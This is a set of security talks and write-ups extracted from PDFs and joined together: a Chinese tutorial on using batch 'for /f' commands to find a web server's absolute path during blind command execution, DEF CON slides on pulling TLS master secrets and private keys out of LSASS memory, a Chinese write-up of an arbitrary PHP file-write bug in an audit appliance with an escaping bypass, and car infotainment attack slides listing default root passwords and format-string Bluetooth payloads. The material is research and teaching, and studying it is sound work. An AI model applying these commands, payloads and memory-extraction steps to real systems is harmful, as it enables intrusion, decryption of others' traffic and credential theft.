(这⾥去掉了cmd /c,⽤的时候再加上也是可以的)
for /f %i in ('dir /s /b C:\Users\46479\qqqq.txt') do (echo
%i)
1
但是发现不⽀持有空格的路径
改进⼀下脚本
加⼊了"delims=***",原理就是指定***\为分割符号,⽽不是以空格为分割符
把该路径写⼊到新⽂件的命令,结合起来就是:
for /f "delims=***" %i in ('dir /s /b
C:\Users\46479\qqqq.txt') do (echo %i)`
1
for /f "delims=***" %i in ('dir /s /b
C:\Users\46479\qqqq.txt') do (echo %i>%i.jsp)
1
绝对路径写⼊到qqqq.txt.jsp成功:
根据实际情况更改后缀,让web可以直接访问到。
我以为就这样就结束了,没想到这个命令在批处理下运⾏是有坑的,⽆法运⾏
经过摸索后才发现,该命令在批处理下还需要做些改变,具体规则如下:
* 第⼀,批处理中单字符变量的引⽤使⽤要把%改为%%
* 第⼆, 要将⽤命令的执⾏结果作为循环体,⽤反引号``不是单引号''
* 第三,使⽤反引号情况下, /F选项要加上 usebackq参数
转换后的命令如下:
for /f "usebackq delims=***" %%i in (`DIR /s /b
D:\User\46479\qqqq.txt`) do (echo %%i>%%i.txt)
1
这样⼦就可以在批处理下执⾏成功了
总结
Windows命令执⾏、不出⽹、不回显,在某些特殊情况需要获取web的绝对路径
如果是直接在cmd中执⾏
如果是在⼀个批处理脚本中执⾏命令,需要改为
以上命令意思就是在D盘下搜索login.jsp⽂件,把搜到的⽂件,以添加.txt后缀形
式创建⼀个新的⽂件在当前搜到的⽬录
例如在 D:\web\login.jsp 发现了该login.jsp⽂件,那么就会创建
D:\web\login.jsp.txt ⽂件,⽂件内容就是 D:\web\login.jsp 。
以上的后缀、路径可以根据实际情况进⾏更改。
for /f "delims=***" %i in ('dir /s /b D:\login.jsp') do
(echo %i>%i.txt)
1
for /f "usebackq delims=***" %%i in (`DIR /s /b
D:\login.jsp`) do (echo %%i>%%i.txt)
1
贴⼀个实战成功的截图: | pdf |
Cunning with CNG:
Soliciting Secrets from Schannel
DEF COn 24
1470502800
Why do you care?
Ability to decrypt Schannel TLS connections that use ephemeral key exchanges
Ability to decrypt and extract private certificate and session ticket key directly
from memory
Public Cert/SNI to PID/Logon Session Mapping
What you get out of this talk
Agenda
A very short SSL/TLS Review
A background on Schannel & CNG
The Secret Data
The Forensic Context
Demo >.>
DisclaimeR
This is NOT an exploit
It’s just the spec :D
…and some implementation specific oddities
Microsoft has done nothing [especially] wrong
To the contrary, their documentation was actually pretty great
Windows doesn’t track sessions for processes that load their own TLS libs
I’m looking at you Firefox and Chrome
Windows doesn’t track sessions for process that don’t use TLS…
That’d be you TeamViewer...
BackgroUnd
TLS, Schannel, and CNG
The now
infamous TLS
Handshake
[ Initial Connection ]
E.G.: TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
The now
infamous TLS
Handshake
or, Session Resumption
PeRFect FoRWaRd Secrecy
What we want to do
One time use keys, no sending secrets!
What TLS actually does
Caches values to enable resumption
recommends `An upper limit of 24 hours is suggested for session ID lifetimes`
When using session ticket extension, sends the encrypted state over the network
basically returning to the issue with RSA, but using a more ephemeral key...
What implementations also do
Store symmetric key schedules (so you can find the otherwise random keys...)
Cache ephemeral keys and reuse for a while...
YEAR: 1992
CLASS: HUMAN
ID: WHITFIELD DIFFIE
EVENT: AUTHENTICATION AND
AUTHENTICATED KEY EXCHANGES
Schannel & CNG
Secure Channel
It’s TLS -> the Secure Channel for Windows!
A library that gets loaded into the “key isolation
process” and the “client” process
Technically a Security Support Provider (SSP)
Spoiler: the Key Isolation process is LSASS
The CryptoAPI-Next Generation (CNG)
Introduced in Vista (yes you read correctly)
Provides Common Criteria compliance
Used to store secrets and ‘crypt them
Storage via the Key Storage Providers (KSPs)
Generic data encryption via DPAPI
Also brings modern ciphers to Windows (AES for
example) and ECC
Importantly, ncrypt gets called out as the “key
storage router” and gateway to the CNG Key
Isolation service
Schannel Preferred Cipher Suites
Windows 7
Windows 10
Windows Vista
*ListCipherSuites sample code found here: https://technet.microsoft.com/en-us/library/bb870930.aspx
CLASS: RoBOT
QUERY: Y U STILL USE
VISTA, BABY???
Microsoft’s TLS/SSL Docs
ClientCacheTime: “The first time a client connects to a server through the Schannel SSP, a full TLS/SSL
handshake is performed.”
“When this is complete, the master secret, cipher suite, and certificates are stored in the session cache on
the respective client and server.”*
ServerCacheTime: “…Increasing ServerCacheTime above the default values causes Lsass.exe to consume
additional memory. Each session cache element typically requires 2 to 4 KB of memory”*
MaximumCacheSize: “This entry controls the maximum number of cache elements. […] The default value
is 20,000 elements.” *
*TLS/SSL Settings quoted from here: https://technet.microsoft.com/en-us/library/dn786418(v=ws.11).aspx
Schannel
by the docs
Diagram based on:
https://technet.microsoft.com/en-us/library/dn786429.aspx
CNG
Key Isolation
by the docs
Diagram based on: https://msdn.microsoft.com/en-us/library/windows/desktop/bb204778.aspx
Background Summary
We’re Looking Here
For These
Because of That
LSASS.exe
Mission
We want to be able to see data that has been protected with TLS/SSL and subvert efforts
at implementing Perfect Forward Secrecy
We want to gather any contextual information that we can use for forensic purposes,
regardless of whether or not we can accomplish the above
We (as an adversary) want to be able to get access to a single process address space and
be able to dump out things that would enable us to monitor/modify future traffic, or
possibly impersonate the target
We want to do this without touching disk
SecrEts
ThE Keys
Master Secret
Session Keys
Ephemeral Private Key*
Persistent Private Key
(Signing)
Session Ticket Key*
Pre-Master Secret
+
The Keys? What do they get us?
=
=
=
=
a single connection
a single session
multiple sessions
multiple sessions + identity
The Keys? We got ’em…all.
*
CSessionCacheServerItem
+0xF0
CSslCredential
+0x48
CSslServerKey
+0x08
NcryptSslKey
+0x10
NcryptsslpKey
pair +0x18
NcryptKey
+0x10
KPSPK
+0xD0
CSslContext
CEphemKeyData
+0x48
NcryptSslkey
+0x10
NcryptSslpEphemKey
+0x18
NcryptKey
+0x10
KPSPK
+0x60
*
CSessionCache<type>Item
+0xF0
NcryptSslkey
+0x10
NcryptsslpMasterKey
+0x30
CSslUserContext
+0x18, +0x20
NcryptsslpSessionKey
+0x18
BcryptKey
+0x10
MSSymmetricKey
+0x18
msprotectkey
BcryptKey
+0x10
MSSymmetricKey
+0x18
EccKey
+0x18
NcryptSslKey
+0x10
Session Keys
Smallest scope / most ephemeral
Required for symmetric encrypted comms
Not going to be encrypted
Approach Premise:
Start with AES
AES keys are relatively small and pseudo-random
AES key schedules are larger and deterministic
… they are a “schedule” after all.
Key schedules usually calculated once and stored*
Let’s scan for matching key schedules on both
hosts
FindAES from: http://jessekornblum.com/tools/
Session Keys
_SSL_SESSION_KEY
4
cbStructLength
4
dwMagic [“ssl3”]
4
dwProtocolVersion
4/8
pvCipherSuiteListEntry
4
IsWriteKey
4/8
pvBcryptKeyStruct
_BCRYPT_KEY_HANDLE
4
cbStructLength
4
dwMagic [“UUUR”]
4/8
pvBcryptProvider
4/8
pvBcryptSymmKey
_MS_SYMMETRIC_KEY
4
cbStructLength
4
dwMagic [“MSSK”]
4
dwKeyType
...
...
4
KeyLength
?
SymmetricKey
?
SymmKeySchedule
CSslUserContext
Look familiar? Bcrypt keys are used a lot: think Mimikatz
The Ncrypt SSL Provider (ncryptsslp.dll)
These functions do three things:
Check the first dword for a size value
Check the second dword for a magic ID
Return the passed handle* if all is good
Ncryptsslp Validation function Symbols
Ncryptsslp Validation function Symbols
*Handles are always a pointer here
The Ncrypt SSL Provider (ncryptsslp.dll)
SSL Magic
Size (x86)
Size (x64)
Validation Functions
ssl1
0xE4
0x130
SslpValidateProvHandle
ssl2
0x24
0x30
SslpValidateHashHandle
ssl3
?
?
<none>
ssl4
0x18
0x20
SslpValidateKeyPairHandle
ssl5
0x48
0x50
SslpValidateMasterKeyHandle
ssl6
0x18
0x20
SslpValidateEphemeralHandle
ssl7
?
?
<none>
ssl3 was already discussed,
appears in the following functions:
TlsGenerateSessionKeys+0x251
SPSslDecryptPacket+0x43
SPSslEncryptPacket+0x43
SPSslImportKey+0x19a
SPSslExportKey+0x76
Ssl2GenerateSessionKeys+0x22c
Pre-Master Secret (PMS)
The ‘ssl7’ struct appears to be used specifically
for the RSA PMS
As advised by the RFC, it gets destroyed quickly,
once the Master Secret (MS) has been derived
Client generates random data, populates the
ssl7 structure, and encrypts
In ECC the PMS is x-coordinate of the shared
secret derived (which is a point on the curve), so
this doesn’t /seem/ to get used in that case
Functions where ssl7 appears:
ncryptsslp!SPSslGenerateMasterKey+0x75
ncryptsslp!SPSslGenerateMasterKey+0x5595
ncryptsslp!SPSslGeneratePreMasterKey+0x15e
ncryptsslp!TlsDecryptMasterKey+0x6b
Bottom line:
It’s vestigial for our purposes - it doesn’t do
anything another secret can’t
Master Secret
Basically the Holy Grail for a given connection
It always exists
It’s what gets cached and used to derive
the session keys
Structure for storage is simple - secret is
unencrypted (as you’d expect)
This + Unique ID = decryption, natively in tools
like wireshark
So...how do we get there?
_SSL_MASTER_SECRET
4
cbStructLength
4
dwMagic [“ssl5”]
4
dwProtocolVersion
0/4
dwUnknown1* [alignment?]
4/8
pCipherSuiteListEntry
4
bIsClientCache
48
rgbMasterSecret
4
dwUnknown2 [reserved?]
Master Secret
_SSL_MASTER_SECRET
4
cbStructLength
4
dwMagic [“ssl5”]
4
dwProtocolVersion
0/4
dwUnknown1* [alignment?]
4/8
pCipherSuiteListEntry
4
bIsClientCache
48
rgbMasterSecret
4
dwUnknown2 [reserved?]
Master Secret Mapped to Unique Identifier
The Master Key is linked back to a unique ID
through an “NcryptSslKey”
The NcryptSslKey is referenced by an
“SessionCacheItem”
The SessionCacheItem contains either the
SessionID, or a pointer and length value for a
SessionTicket
Instantiated as either client or server
item
At this point, we can find cache items, and extract
the Master Secret + Unique ID
… Houston, we has plaintext.
_SESSION_CACHE_CLIENT_ITEM
4/8
pVftable
…
…
@0x10
pMasterKey
…
…
@0x88
rgbSessionID[0x20]
…
…
@0x128
pSessionTicket
@0x130
cbSessionTicketLength
_NCRYPT_SSL_KEY_HANDLE
4
cbStructLength
4
dwMagic [“BDDD”]
4/8
pNcryptSslProvider
4/8
pNcryptSslKey
_SSL_MASTER_SECRET
4
cbStructLength
4
dwMagic [“ssl5”]
4
dwProtocolVersion
0/4
dwUnknown1* [alignment?]
4/8
pCipherSuiteListEntry
4
bIsClientCache
48
rgbMasterSecret
4
dwUnknown2 [reserved?]
Master Secret Mapped to Unique Identifier
RSA Session-
ID:97420000581679ae7a064f3e4a350682dca9e839ebca0
7075b1a944d8b1b71f7 Master-
Key:897adf533d0e87eadbc41bc1a13adb241251a56f0504
35fad0d54b1064f83c50cedb9d98de046008cde04a409779
5df2
RSA Session-
ID:f5350000be2cebcb15a38f38b99a20751ed0d53957890
1ddde69278dbbf9738e Master-
Key:716a1d493656bf534e436ffb58ff2e40000516b735db
d5dfaff93f37b5ac90ba1c3a25ba3e1505b8f3aa168a657e
007b
RSA Session-
ID:bcb3aff3581fccb9fe268d46f99f5e2c6cc9e59e51c67
14d70997e63b9c6fe73 Master-
Key:e45e18945197c2f0a2addb901a9558f194241d2b488c
dc3d1f81e1271acb4dc776e3c772177c7d0462afeca57a3d
9cb2
RSA Session-
ID:c7d0f952fb3fc4999a692ce3674acb1a4b2c791ece2c6
d1621af95e6414ec3b0 Master-
Key:db93026b71e0323b60e2537f0eeebf4fc321094b8a9a
6ccd8cf0f50c7fa68c294f6c490d5af3df881db585e2a10a
0aea
Wireshark SSL Log Format
Wireshark SSL input formats found here: https://github.com/boundary/wireshark/blob/master/epan/dissectors/packet-ssl.c
Ephemeral & Persistent Private Keys
Both share the same structure
Both store secrets in a Key Storage Provider
Key struct (KPSK)
The “Key Type” is compared with different
values
ssl6 gets compared with a list stored in
bcryptprimitives
ssl4 gets compared with a list stored in
NCRYPTPROV
The Key Storage Provider Key (KPSK) is
referenced indirectly through an “Ncrypt
Key” struct*
*NcryptKey not to be confused with NcryptSslKey
_SSL_KEY_PAIR
4
cbStructLength
4
dwMagic [ “ssl4” | “ssl6” ]
4
dwKeyType
4
dwUnknown1 [alignment?]
4/8
pKspProvider
4/8
pKspKey
_NCRYPT_KEY_HANDLE
4
cbStructLength
4
dwMagic [ 0x44440002 ]
4
dwKeyType
4
dwUnknown1 [alignment?]
4/8
pKspProvider
4/8
pKspKey
_KSP_KEY
4
cbStructLength
4
dwMagic [ “KSPK” ]
4
dwKeyType
...
...
@0x60
pMSKY
@0xD0
pDpapiBlob
@0xD8
dwDpapiBlobLength
Ephemeral Private Key
For performance, reused across connections
Given the public connection params, we can
derive the PMS and subsequently MS
Stored unencrypted in a LE byte array
Inside of MSKY struct
The curve parameters are stored in the KPSK
Other parameters (A&B, etc) are stored in MSKY
w/ the key
Verified by generating the Public & comparing
The Public Key is also stored in the first pointer
of the CEphemData struct that points to “ssl6”
In-line with suggestion of this paper: http://dualec.org/DualECTLS.pdf
“Persistent” Private Key
The RSA Key that is stored on disk
Unique instance for each private RSA Key – by
default, the system has several
E.g. one for Terminal Services
RSA Keys are DPAPI protected
Lots of research about protection / exporting
Note the MK GUID highlighted from the Blob
The Key is linked to a given Server Cache Item
Verified by comparing the DPAPI blob in
memory to protected certificate on disk
Also verified through decryption
Decrypting Persistent Key - DPAPI
Can extract the blob from memory and decrypt w/ keys
from disk
DPAPIck / Mimikatz
OR
Can decrypt directly from memory :D
MasterKeys get cached in Memory
On Win10 in: dpapisrv!g_MasterKeyCacheList
See Mimilib for further details
Even though symbols are sort of required, we
could likely do without them
There are only two Bcrypt key pointers in lsasrv’s
.rdata section (plus one lock)
Identifying the IV is more challenging
Cached DPAPI MK + Params to Decrypt
Decrypting Persistent Key - DPAPI
Session Tickets
Not seemingly in widespread use with IIS?
Comes around w/ Server 2012 R2
Documentation is lacking.
Enabled via reg key + powershell cmdlets?
Creates an “Administrator managed”
session ticket key
Schannel functions related to Session Tickets
load the keyfile from disk
Export-TlsSessionTicketKey :D
Reference to DISABLING session tickets in Win8.1 Preview release notes: https://technet.microsoft.com/en-us/library/dn303404.aspx
Session Ticket Key
Keyfile contains a DPAPI blob, preceded by a
SessionTicketKey GUID + 8 byte value
Key gets loaded via schannel
The heavy lifting (at least in Win10) is done
via mskeyprotect
AES key derived from decrypted blob via
BCryptKeyDerivation()
Key gets cached inside mskeyprotect!
No symbols for cache : /
No bother, we can just find the Key GUID
that’s cached with it :D
Session Ticket Key GUID
Possibly Salt or MAC?
Size of ensuing DPAPI Blob
DPAPI Blob (contains it’s own fields)
Decrypting Session Tickets
Session Ticket structure pretty much follows the
RFC (5077), except:
MAC & Encrypted State are flipped (makes
a lot of sense)
After extracting/deriving the Symm key, it’s just
straight AES 256
Contents of the State are what you’d expect:
Timestamp
Protocol/Ciphersuite info
MS struct
Key GUID
IV
MAC
Encrypted
TLS
State
Decrypting Session Tickets
Master Secret
Secrets are cool and all...
But Jake, what if I don’t have a packet capture?
(And I don’t care about future connections?)
ThE Context
Inherent Metadata TLS Provides
Core SSL/TLS functionality
Timestamps
The random values *typically* start with a 4-byte
timestamp (if you play by the RFCs)
Identity / fingerprinting
Public Key
Session ID*
Offered Cipher Suites / Extensions
Session ID’s are arbitrary, but are not always
random -> Schannel is a perfect example
uses MaximumCacheEntries parameter when creating
the first dword of the random, leading to a(n
imperfect) fingerprint of two zero bytes in 3/4th byte*
TLS Extensions
Server Name Indication (SNI)
Virtual hosts
Application-Layer Protocol Negotiation (ALPN)
Limited, but what protocol comes next
fingerprinting?
Session Tickets
Key GUID
*Referenced in this paper: http://dualec.org/DualECTLS.pdf
Schannel Caching Parameters
Parameters:
The following control upper-limit of cache time:
m_dwClientLifespan
m_dwServerLifespan
m_dwSessionTicketLifespan
All of which:
are set to 0x02255100 (10hrs in ms)
Also of Interest:
m_dwMaximumEntries (set to 0x4e20 or 20,000
entries by default)
m_dwEnableSessionTicket controls use of
session tickets (e.g. 0, 1, 2)
m_dwSessionCleanupIntervalInSeconds (set
to 0x012c or 300 seconds by default)
HOWEVER!
Schannel is the library, the process has control
Proc can purge its own cache at will
For example, IIS reportedly* purges after
around two hours
Schannel maintains track of process, frees cache
items after client proc terminates : <
Haven’t looked at the exact mechanism
As you’ll see, the upside is that the Process
ID is stored in the Cache
This is your Schannel Cache (x64)
'_SSL_SESSION_CACHE_CLIENT_ITEM': [ 0x148, {
'Vftable': [0x0, ['pointer64', ['void']]],
'MasterKey': [0x10, ['pointer64', ['void']]],
'PublicCertificate': [0x18, ['pointer64', ['void']]],
'PublicKey': [0x28, ['pointer64', ['void']]],
'NcryptSslProv': [0x60, ['pointer64', ['void']]],
'SessionIdLen': [0x86, ['short short']],
'SessionId': [0x88, ['array', 0x20, ['unsigned char']]],
'ProcessId': [0xa8, ['unsigned long']],
'MaxLifeTime': [0xB0, ['unsigned long']],
'CertSerializedCertificateChain': [0xB0, ['pointer64', ['void']]],
'UnkList1Flink': [0xB8, ['pointer64', ['void']]],
'UnkList1Blink': [0xC0, ['pointer64', ['void']]],
'UnkCacheList2Flink': [0xC8, ['pointer64', ['void']]],
'UnkCacheList2Blink': [0xD0, ['pointer64', ['void']]],
'ServerName': [0x108, ['pointer64', ['void']]],
'LogonSessionUID': [0x110, ['pointer64', ['void']]],
'CSessCacheManager': [0x120, ['pointer64', ['void']]],
'SessionTicket': [0x138, ['pointer64', ['void']]],
'SessionTicketLen': [0x140, ['int']],
}],
This is your Schannel Cache (x64)
'_SSL_SESSION_CACHE_SERVER_ITEM': [ 0x110, {
'Vftable': [0x0, ['pointer64', ['void']]],
'NcryptKey': [0x10, ['pointer64', ['void']]],
'NcryptSslProv': [0x60, ['pointer64', ['void']]],
'SessionId': [0x88, ['array', 0x20, ['unsigned char']]],
'ProcessId': [0xa8, ['unsigned long']],
'MaxLifeTime': [0xB0, ['unsigned long']],
'LastError?': [0xE8, ['unsigned long']],
'CSslCredential': [0xF0, ['pointer64', ['void']]],
}],
This is your Schannel Cache on Drugs Vista
'_SSL_SESSION_CACHE_CLIENT_ITEM': [ 0xf0, {
'Flink': [0x0, ['pointer', ['void']]],
'Blink': [0x4, ['pointer', ['void']]],
'ProcessId': [0x8, [['unsigned long']],
'MasterKey': [0x14, ['pointer', ['NcryptSslKey']]],
'CipherSuiteId': [0x1C, ['pointer', ['void']]],
'ECCurveParam': [0x20, ['pointer', ['void']]],
'NcryptSslProv': [0x28, ['pointer', ['void']]],
'PublicCertificate': [0x2C, ['pointer', ['void']]],
'PublicCert2': [0x34, ['pointer', ['void']]],
'PublicKeyStruct': [0x3C, ['pointer', ['void']]],
'PublicCertStruct3': [0x44, ['pointer', ['void']]],
'ServerName': [0x80, ['pointer', ['void']]],
'SessionIdSize': [0x94, ['short short']],
'SessionId': [0x98, ['array', 0x20, ['unsigned char']]],
'ErrorCode': [0xEC, ['pointer64', ['void']]],
}],
AUtomation
Volatility / Rekall
Plugins for both – by default (no args) they:
Find LSASS
Scan Writeable VADs / Heap for Master Key
signature (Volatility) or directly for
SessionCacheItems (Rekall)
Dump out the wireshark format shown earlier
Hoping to have functional powershell module or
maybe incorporation into mimikatz? (Benjamin
Delphy is kinda the man for LSASS)
Limitations
We’re working with internal, undocumented structures
They change over time -- sometime around April 2016, an element appears to have been inserted in
cache after the Session ID and before the SNI
Not a huge deal, except when differences amongst instances of same OS (e.g. ones that have
and have not been updated)
Relying on symbols for some of this
MS giveth and can taketh away.
Still, can be done without them, just slightly less efficiently.
You need to be able to read LSASS memory
Not a huge deal in 2016, but still merits mention -- you need to own the system
If you own the system, you can already do bad stuff (keylog / tap net interface)
This is why it’s probably most useful in a forensic context
Decrypting an RDP Session (Ephemeral 🔑 XCHG)
DOMO TIME
Decrypting an RDP Session (Ephemeral 🔑 XCHG)
Keycodes from: https://msdn.microsoft.com/en-us/library/aa299374.aspx
H
e
l
l
o
<space>
D
e
f
c
0
n
“
”
Fin.
QUestions?
@TinRabbit_
Special Thanks
For general support, helpful comments, their time, and encouragement.
Áine Doyle
Badass Extraordinaire
(OCSC)
Dr. John-Ross Wallrabenstein
Sypris Electronics
Dr. Marcus Rogers
Purdue Cyber Forensics Laboratory
Michael Hale Ligh (MHL)
Volexity
Tatiana Ringenberg
Sypris Electronics | pdf |
某运维审计系统任意⽂件写⼊漏洞挖掘过程
分享下最近挖掘漏洞的⼀些⼿段。
临近实习,有⽊有⼤佬收实习⼩弟,端茶倒⽔样样精通。
⽬标系统如下:
是⼀个安全审计系统,根据主⻚的关键词在⽹络安全产品⼤全中进⾏查询,得知⽬标系统开发商为⼴州某科。
`⽹络安全产品⼤全`:https://t.wangan.com/c/products.html
同时,通过搜索引擎查到了⼀些历史漏洞。
本以为可以直接拉出payload出来打呢。但是看了下,⽬前所遇到的系统版本为3.*最新版,⽽乌云所存储的时间居然是2011年?
这明显对不上了,且新版使⽤的mvc模式。直接略过
既然没有可利⽤的公开漏洞,那么只有⾃⼰挖掘漏洞了。还是⽼⽅法,通过fofa采集了⼀波相同程序的站点,准备探测⼀下弱⼝令,
进去挖⼀些未授权的漏洞。
测了⼗⼏个站点,都没有⼀个成功的。。。卒!
因为这类系统⼀般都是采⽤的iso镜像⽂件或者安装包。既然知晓了开发⼚商以及产品版本号。那么可以直接去找⼀下镜像或者安装
包,脱取源码进⾏审计。
百度云⽂件搜索引擎:https://www.lingfengyun.com/
根据筛选,发现了某⽤户在19年分享过这类系统的操作⽂档。将其下载下来。发现⽂档中包含了openstack以及docker的安装⽅法。
由于openstack需要环境,本机没有配置。所以这⾥我简单看了看docker的安装⽅法。
docker pull 的是⼀个私有仓库。但是,这⾥可以注意下。docker在push的时候⼀般是以⽤户名/镜像名。⼀般在知道⽤户名的情况下
可以尝试去搜索⼀些镜像。在安装⽂档中,pull的地址为*nsec.com。
尝试使⽤docker search xxxnsec 搜索。
这⾥有两个镜像,⼀个是geteway,⼀个是web firewall。但是,当我尝试下载的时候。
去dockerhub上看了⼀下
并没有内容。应该是被清空了。可惜啊。
既然分享过操作⽂档,肯定会有安装包。
直接切⼊该⽤户的详细信息,并且筛选zip,rar等压缩⽂件。最终以⼤⼩确定⼀个结尾为V3.7的zip压缩包。
将其下载到本地。解压出来为iso镜像⽂件。
开始⽤Vmware搭建环境,
根据相关提示,开始安装程序
安装完过后,提示输⼊账户和密码
由于解压出来的⽂件⾥并没有安装⽂档,在历史分享中也并没有找到类似⽂件。盲测了⼏个弱⼝令发现都不⾏。
这⾥想到了忍者师傅前段时间发过⼀篇⽂章,也是在不知道⽬标主机账户密码的情况下读取系统⽂件。
在本地新建了⼀个centos7系统,添加⼀块现有虚拟磁盘。磁盘⽂件选择运维审计系统的vmdk⽂件
开启centos7系统,查看硬盘以及分区信息
1
sudo fdisk -l
可以看到这⾥多了⼀个sdb2,这就是刚刚添加的现有虚拟磁盘,也就是运维审计系统的磁盘
将其挂载。
因为⽬标程序是使⽤php开发的,这⾥直接find查找⼀下
找到对应路径 直接tar 打包整个⽂件夹,拖出来。源码到⼿~!
开始审计。
由于是MVC模式,直接找Controller
在indexController下发现某⽅法存在调⽤file_put_centents()函数
且参数可控。并且在第三⾏,调⽤了file_put_centents。可造成任意⽂件写⼊。
cert为内容,username由于是在末尾拼接,可以直接../跨⽬录
准备写个phpinfo进去,测试下可执⾏性
发现写⼊的⽂件内容被替换了,经过⼀系列测试,发现只要出现<>; '"就会在该字符前⾯加⼀个\
由于\的写⼊导致php代码语法错误,不能被执⾏。这⾥想到了php的特性
链接https://blog.csdn.net/chengjianghao/article/details/100078052
加结尾的:之后的内容视为 纯⽂本直接输出,直到再次碰到 <? 或 <?php
不加的:之后的内容视为 PHP 代码,除⾮没有代码了。
不加结尾并不影响php代码的执⾏。如果传⼊<?php phpinfo(); 那么最终格式为 \<?php phpinfo()\;
⻜
这⾥的;最终也被替换了。导致语句还是⽆法正常执⾏。这⾥请教了群⾥的师傅
在1师傅的指导下获得了最终的payload: <?php if(expr) 在php中 if是以{}作为结尾。
同理,使⽤while也是可以的。 | pdf |
~ Jay Turla @shipcod3
CAR INFOTAINMENT HACKING
METHODOLOGY AND ATTACK
SURFACE SCENARIOS
WHOAMI
▸ Jay Turla @shipcod3
▸ app security engineer
@Bugcrowd
▸ ROOTCON goon
▸ contributed to some
security tools
▸ I love PS4
▸ Not the creator of Turla malware
▸ Loves to party
BEFORE ANYTHING ELSE….. WE NEED AN INSPIRATIONAL QUOTE
…SCOPE & LIMITATIONS
▸ Infotainment bugs and its attack surfaces
▸ No Canbus Hacking
▸ Methodologies, Security Bugs But Not Full Takeover of the Car
(because infotainments have limitation)
▸ Kinda similar to Jason Haddix’s “The Bug Hunters Methodology”
(in fact inspired by it)
▸ Probably miss out some attack surfaces (only common ones with known
vulnerabilities or proof of concept)
COMMON ATTACK SURFACES
BY CRAIG SMITH IN HIS BOOK
“THE CAR HACKER’S
HANDBOOK”
COMMON ATTACK SURFACES LINKED TO THE
INFOTAINMENT CONSOLE
▸ Bluetooth
▸ Wi-Fi
▸ USB Ports
▸ SD Card Ports
▸ CD-ROM / DVD-ROM
▸ Touch screen and other inputs that allow you to control the console
▸ Audio Jack (hmmm maybe?)
▸ Cellular Connection, GPS, etc.
BLUETOOTH
▸ Bluetooth vulnerabilities
▸ Bluetooth jamming
▸ Code execution
(haven’t seen a PoC on an infotainment yet)
▸ Default bluetooth pairing numbers: “0000," “1111”, “1234"
▸ Malformed or Format String Vulnerabilities (Brick the Device)
▸ Memory corruption - send malformed packages to the head unit
BLUETOOTH CASE - FORMAT STRING
VULNERABILITIES THAT COULD LEAD TO
APPLICATION CRASH OR BRICKING OF YOUR
DEVICE
▸ Some Bluetooth stacks on infotainment systems can be crashed via %x
or %c format string specifiers in a device name, address book name,
song title, etc.
▸ CVE-2017-9212 was assigned to a BMW 330i 2011 car wherein a
researcher from IOActive renamed his device with format string
specifiers & connected his device via Bluetooth to his car which
eventually crashed his system.
▸ Warning! Bricks your system so test at your own risk
▸ WHAT IF it takes you to the desktop environment or debug options?
HERE ARE SOME PAYLOADS
YOU CAN TRY
WI-FI
▸ Wi-Fi deauthentication attacks
▸ Does the firmware update work
over the Internet? Try sniffing the traffic / replace it with a malicious
firmware
▸ Connect to WiFi -> Fetch DHCP IP Address -> Nmap -> what services does
it have? FTP, Telnet, SSH?
▸ Insecure Transmission of Credentials: Telnet and FTP for example
▸ Some of these interfaces have no auth: yes netcat is your friend :)
▸ Exploits for these services
WI-FI CASE: THOSE SERVICES!!!!
▸ Try brute forcing the credentials
- most of these have weak passwords
▸ Get to know the default password
of accessing the system
▸ ROOT pass?
▸ Mazda
- jci : root
- root : jci
- user : jci
WI-FI CASE: THOSE SERVICES!!!!
▸ Daan Keuper and Thijs Alkemade from Computest gained access to the
IVI system's root account for Volkswagen and Audi:
https://www.computest.nl/wp-content/uploads/2018/04/connected-car-
rapport.pdf
KEY TAKEAWAYS ABOUT THE RESEARCH
FROM COMPUTEST
WI-FI CASE: THOSE SERVICES!!!!
▸ Ian Tabor also showed an analysis of the IVI system within the 2015 DS5
1955 Limited Edition. He connected to the device over TCP port 23 (telnet)
without any authentication and executed commands.
USB
▸ Install apps or malicious apps
▸ Update the firmware via USB
▸ Remote Code Execution via the USB stack to IVI
▸ Killer USB - one that destroys your files
▸ Some systems support USB-to-ETHERNET adapters by default (another
way for your device to have an IP address)
USB CASE: MY CASE
▸ Owners of Mazda cars have been modding and installing apps to their
infotainment using MZD-AIO-TI (MZD All In One Tweaks Installer) in the
Mazda3Revolution forum since 2014.
USB CASE: MY CASE
▸ Got curious so read one of the details from a pdf that allows you to pull up data from CMU and
also analyze the app from Trez
▸ Reference:
https://github.com/shipcod3/mazda_getInfo/blob/master/cmu_pull_up_details/CMU%20data%20
pull%20tool%20instructions.pdf
USB CASE: MY CASE
USB CASE: MY CASE
USB CASE: MY CASE
▸ Our main focus is the text file
USB CASE: MY CASE
▸ Putting it all together for a PoC: https://github.com/shipcod3/mazda_getInfo/
USB CASE: MY CASE
USB CASE
▸ Researchers from Keen Security Lab also found local code execution via
the USB through an update
SD CARD SLOT & CD-ROM / DVD
ROM
▸ Basically the same thing with what’s discussed on the USB Port = load
something
SD CARD SLOT CASE
▸ For Mazda, using the known cmu bug, you can deploy apps via the SD
card: https://github.com/flyandi/mazda-custom-application-sdk
TOUCH SCREEN / INTERFACE
▸ Connect to WI-FI to establish IP address
▸ PRESS anything, multitask - cause an overflow
▸ Picture below from my uncle
IS THIS TRUE?
▸ NOPE! It’s just a joke
GSM, CELLULAR CONNECTION,
PHONE APP TO CAR, ETC
▸ Do you have an app that connects to your car? Time for some mobile app
testing
▸ Test the URLs you intercepted while testing the app:
https://www.troyhunt.com/controlling-vehicle-features-of-nissan/
▸ Eavesdrop on the connections
▸ Reverse engineer the app -> get the API keys?
RESPONSIBLE DISCLOSURE & BUG
BOUNTY PROGRAMS
▸ Fiat Chrysler Automobiles - https://bugcrowd.com/fca
▸ Tesla Motors - https://bugcrowd.com/tesla
▸ General Motors - https://hackerone.com/gm
AS REQUESTED…
VIDEO DEMO
REFERENCES
▸ The Car Hacker’s Handbook by Craig Smith: http://opengarages.org/handbook/ebook
▸ Memes from Google lol
▸ http://openmzdc.wikia.com/wiki/Getting_started
▸ https://mazdatweaks.com/
▸ Volkswagen and Audi Cars Vulnerable to Remote Hacking https://www.computest.nl/wp-
content/uploads/2018/04/connected-car-rapport.pdf
▸ https://www.bleepingcomputer.com/news/security/volkswagen-and-audi-cars-vulnerable-to-
remote-hacking/
▸ https://www.mintynet.com/
▸ https://github.com/shipcod3/mazda_getInfo/
▸ https://keenlab.tencent.com/en/Experimental_Security_Assessment_of_BMW_Cars_by_KeenLab.
pdf
▸ https://github.com/jaredthecoder/awesome-vehicle-security | pdf |
TenProtect))Conficential,)Copyright)@Tencent,)2019)
游戏安全的攻防艺术
[email protected])
2019.02)
TenProtect))Conficential,)Copyright)@Tencent,)2019)
个⼈人简介
